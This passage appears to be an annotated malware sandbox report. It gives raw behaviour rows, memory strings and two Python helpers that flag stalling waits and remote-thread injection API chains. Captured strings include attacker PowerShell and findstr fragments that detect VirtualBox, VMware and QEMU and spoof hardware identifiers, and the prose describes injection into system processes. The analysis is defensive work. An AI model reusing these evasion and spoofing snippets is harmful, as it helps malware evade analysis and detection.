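            c = WMI_CLASS_RE.search(rest)
            if c:
                s.wmi_classes.add(c.group(1))
        elif rest.startswith("File opened / queried:"):
            name = rest.split(":", 1)[1].strip()
            vendor = classify_artifact(name)
            if vendor:
                s.vm_probes[name] = vendor
        elif rest.startswith("Thread delayed:"):
            d = DELAY_RE.search(rest)
            if d and int(d.group(1)) >= INFINITE_MS:
                s.infinite_waits += 1
        elif (sc := SLEEP_COUNT_RE.match(rest)):
            s.sleep_loops.setdefault(int(sc.group(1)), []).append(int(sc.group(2)))
        elif (st := SLEEP_TIME_RE.match(rest)):
            # Per-thread totals in the report are exact multiples of the sentinel
            # (x1, x3, x5, x8 above), so the quotient is the number of maximal waits.
            total = abs(int(st.group(2)))
            if total >= INFINITE_MS:
                s.max_waits_by_tid[int(st.group(1))] = total // INFINITE_MS
    return dict(out)


def vendors_probed(report):
    """Hypervisor vendors any process in the report tried to fingerprint."""
    return sorted({v for s in report.values() for v in s.vm_probes.values()})


def stalling_processes(report):
    """Processes that issued at least one effectively infinite wait."""
    return sorted(p for p, s in report.items() if s.infinite_waits or s.max_waits_by_tid)


# Constructed input: a subset of the rows from the section above.
SAMPLE_ROWS = [
    r"Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxGuest",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: vmci",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: HGFS",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: \pipe\VBoxTrayIPC",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516 Thread sleep count: 5296 > 30",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7120 Thread sleep time: -7378697629483816s >= -30000s",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3084 Thread sleep time: -2767011611056431s >= -30000s",
    r"Source: C:\Windows\System32\svchost.exe TID: 2052 Thread sleep time: -37000s >= -30000s",
    r"Source: powershell.exe, 00000009.00000002.1690548235.0000027533723000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL",
]

if __name__ == "__main__":
    rep = parse_report(SAMPLE_ROWS)
    for proc, s in sorted(rep.items()):
        print(proc, sorted(s.wmi_classes), s.vm_probes, s.infinite_waits, s.max_waits_by_tid)
    print("vendors:", vendors_probed(rep), "stalling:", stalling_processes(rep))
```

The svchost.exe sleep total (37000) stays below the sentinel and so is not counted as stalling: the 30000 threshold the report prints next to each sleep row is the sandbox's, and legitimate service threads cross it routinely, which is why the helper keys on the sentinel value rather than on that threshold.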
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEED894 FindFirstFileExW, 20_2_000002527DEED894
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 20_2_000002527DEEDA18
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DF1D894 FindFirstFileExW, 20_2_000002527DF1D894
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DF1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 20_2_000002527DF1DA18
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000286D7D1D894 FindFirstFileExW, 21_2_00000286D7D1D894
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000286D7D1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 21_2_00000286D7D1DA18
Source: C:\Windows\System32\conhost.exe Code function: 40_2_000001D54783DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 40_2_000001D54783DA18
Source: C:\Windows\System32\conhost.exe Code function: 40_2_000001D54783D894 FindFirstFileExW, 40_2_000001D54783D894
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0922D894 FindFirstFileExW, 41_2_000001EF0922D894
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0922DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 41_2_000001EF0922DA18
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0942D894 FindFirstFileExW, 41_2_000001EF0942D894
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0942DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 41_2_000001EF0942DA18
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 42_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1ED894 FindFirstFileExW, 42_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 42_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D21D894 FindFirstFileExW, 42_2_000001CA7D21D894
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 43_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD5D894 FindFirstFileExW, 43_2_0000017D2DD5D894
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B92DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 44_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B92D894 FindFirstFileExW, 44_2_0000022F4B92D894
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B95DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 44_2_0000022F4B95DA18
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B95D894 FindFirstFileExW, 44_2_0000022F4B95D894
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1CDDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 45_2_00000262F1CDDA18
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1CDD894 FindFirstFileExW, 45_2_00000262F1CDD894
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 45_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D0D894 FindFirstFileExW, 45_2_00000262F1D0D894
Source: C:\Windows\System32\svchost.exe Code function: 46_2_0000023942B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 46_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exe Code function: 46_2_0000023942B1D894 FindFirstFileExW, 46_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF056DD894 FindFirstFileExW, 47_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF056DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 47_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF0570D894 FindFirstFileExW, 47_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF0570DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 47_2_000001EF0570DA18
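The first row of this section is a dllhost.exe routine that opens a process, resolves its image name (K32GetModuleFileNameExW, PathFindFileNameW, StrCmpIW), reads the last sub-authority of a token SID (GetTokenInformation, GetSidSubAuthorityCount, GetSidSubAuthority: the way an integrity-level RID is read from a token) and then allocates, writes and starts a thread in the target (VirtualAllocEx, WriteProcessMemory, NtCreateThreadEx). The FindFirstFileExW/FindNextFileW rows above appear in cmd, conhost, dllhost, winlogon, lsass, svchost and dwm at addresses whose low 16 bits are identical (...D894 and ...DA18), which is consistent with one injected image mapped at different 64 KiB-aligned bases. The Python below is an added example of deriving such verdicts from the report's "Code function" rows; it is not the sandbox's rule engine, and the pattern names and step lists are my own assumptions. The embedded rows are a constructed subset copied from this section.

```python
import re

# Row layout: "Source: <image path> Code function: [<id>] <api>,<api>,..., <id>"
CODE_ROW_RE = re.compile(r"^Source:\s+(?P<proc>\S+?\.exe)\s+Code function:\s+(?P<rest>.+)$", re.I)
FUNC_ID_RE = re.compile(r"^\d+_\d+_[0-9A-Fa-f]+$")

# Ordered (not necessarily adjacent) API steps; a tuple inside lists accepted alternatives.
# Pattern names and step lists are my own, not the sandbox's rule definitions.
PATTERNS = {
    "remote-thread-injection": (
        "OpenProcess", "VirtualAllocEx", "WriteProcessMemory",
        ("NtCreateThreadEx", "CreateRemoteThread", "RtlCreateUserThread"),
    ),
    # The last SID sub-authority of TokenIntegrityLevel is the integrity RID.
    "token-integrity-check": ("OpenProcessToken", "GetTokenInformation",
                              "GetSidSubAuthorityCount", "GetSidSubAuthority"),
    "target-by-image-name": ("K32GetModuleFileNameExW", "PathFindFileNameW", "StrCmpIW"),
    "directory-enumeration": ("FindFirstFileExW", "FindNextFileW", "FindClose"),
}


def parse_code_function_row(row):
    """Return (image name, function id, [apis]) for one 'Code function' row, else None."""
    m = CODE_ROW_RE.match(row.strip())
    if not m:
        return None
    proc = m.group("proc").rsplit("\\", 1)[-1].lower()
    tokens = m.group("rest").split()
    func_id = tokens[-1]
    apis = [a for t in tokens[:-1] for a in t.split(",") if a and not FUNC_ID_RE.match(a)]
    return proc, func_id, apis


def matches_in_order(apis, pattern):
    """True if every step of `pattern` occurs in `apis` in order, gaps allowed."""
    pos = 0
    for step in pattern:
        alts = step if isinstance(step, tuple) else (step,)
        hit = next((i for i in range(pos, len(apis)) if apis[i] in alts), None)
        if hit is None:
            return False
        pos = hit + 1
    return True


def classify_rows(rows):
    """Map (image, function id) -> matched pattern names; other row kinds are skipped."""
    out = {}
    for row in rows:
        parsed = parse_code_function_row(row)
        if parsed is None:
            continue
        proc, func_id, apis = parsed
        out[(proc, func_id)] = [n for n, p in PATTERNS.items() if matches_in_order(apis, p)]
    return out


def shared_offsets(rows, low_bits=16):
    """Group processes by the low address bits of each function id.  Image bases are
    64 KiB aligned, so identical low 16 bits across processes point at one image
    mapped at different bases (the injected payload rather than the host binary)."""
    groups = {}
    for row in rows:
        parsed = parse_code_function_row(row)
        if parsed is None:
            continue
        proc, func_id, _ = parsed
        addr = int(func_id.rsplit("_", 1)[-1], 16)
        groups.setdefault(addr & ((1 << low_bits) - 1), set()).add(proc)
    return groups


# Constructed input: rows copied from the section above.
SAMPLE_ROWS = [
    r"Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 41_2_0000000140001868",
    r"Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEED894 FindFirstFileExW, 20_2_000002527DEED894",
    r"Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 20_2_000002527DEEDA18",
    r"Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000286D7D1D894 FindFirstFileExW, 21_2_00000286D7D1D894",
    r"Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0922D894 FindFirstFileExW, 41_2_000001EF0922D894",
    r"Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1ED894 FindFirstFileExW, 42_2_000001CA7D1ED894",
    r"Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD5D894 FindFirstFileExW, 43_2_0000017D2DD5D894",
    r"Source: C:\Windows\System32\cmd.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep",
]

if __name__ == "__main__":
    for key, names in classify_rows(SAMPLE_ROWS).items():
        print(key, names)
    for low, procs in sorted(shared_offsets(SAMPLE_ROWS).items()):
        print(hex(low), sorted(procs))
```

Subsequence matching rather than exact-sequence matching is deliberate: the dllhost routine interleaves CloseHandle, lstrlenW and error handling between the steps that matter, and a rule that required adjacency would miss it.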
Source: svchost.exe, 00000035.00000002.2582402751.000002A769A42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000000.2144910472.000002A769A42000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxservice
Source: svchost.exe, 00000035.00000000.2144910472.000002A769A42000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@vmci
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxsf.sys
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: svchost.exe, 00000030.00000002.2582876594.000002287A02B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 00000035.00000003.2189080671.000002A76A565000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.53.dr Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dcPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: dwm.exe, 0000002D.00000000.2095647683.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: dRomNECVMWarVMware_SATA_
Source: svchost.exe, 00000035.00000003.2189080671.000002A76A565000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: cmd.exe, 00000014.00000003.1681248297.000002527D8A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.53.dr Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.dr Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: LSI_SASVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: dwm.exe, 0000002D.00000000.2095647683.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 00000035.00000002.2643052755.000002A76AF0A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMCI: Using capabilities (0x1c).
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.dr Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: powershell.exe, 00000009.00000002.1690548235.0000027533560000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: qemu-ga
Source: powershell.exe, 00000009.00000002.1690548235.0000027533723000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: cmd.exe, 00000014.00000003.1690532569.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1689954299.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1690299922.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1690649623.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1681785940.000002527D8C6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1689333508.000002527D8C6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1689704060.000002527D8C6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1691446587.000002527D8C6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1691192247.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: svchost.exe, 00000035.00000000.2147943830.000002A76A49A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmcir:m
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $Hyper-V Time Synchronization Service
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: svchost.exe, 00000035.00000003.2189080671.000002A76A565000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: nonicVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 00000035.00000002.2644921249.000002A76C0B6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: dowvmci
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.53.dr Binary or memory string: VMware
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxguest.sys
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxguest.sys`
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.dr Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmmouse.sys
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: powershell.exe, 00000009.00000002.1690548235.0000027533560000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: qemuwmi2i
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmusrvc2i
Source: cmd.exe, 00000014.00000003.1689147835.000002527D8F8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1682224430.000002527D8F8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1689227342.000002527D8F8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1682292513.000002527D8F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxsf.sys`
Source: lsass.exe, 0000002B.00000000.2078830491.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: powershell.exe, 00000009.00000002.1690548235.0000027533560000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: QEMU HARDDISK
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxmouse.sys`
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxmouse.sys
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.dr Binary or memory string: $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: C:\Program Files\VMware
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VBoxMouse.sys
Source: svchost.exe, 00000035.00000000.2162013238.000002A76C164000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: dwm.exe, 0000002D.00000000.2095647683.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Bus\0000SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000PCI\VEN_8
Source: lsass.exe, 0000002B.00000000.2078420703.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2573453748.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.2086260407.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.2563397137.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.2097554251.000001EF0502F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2563222103.000001EF0502B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.2584284217.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2102410747.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2117344700.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2562685157.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.2580922407.000002A769A2B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 0000002B.00000000.2078830491.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc@
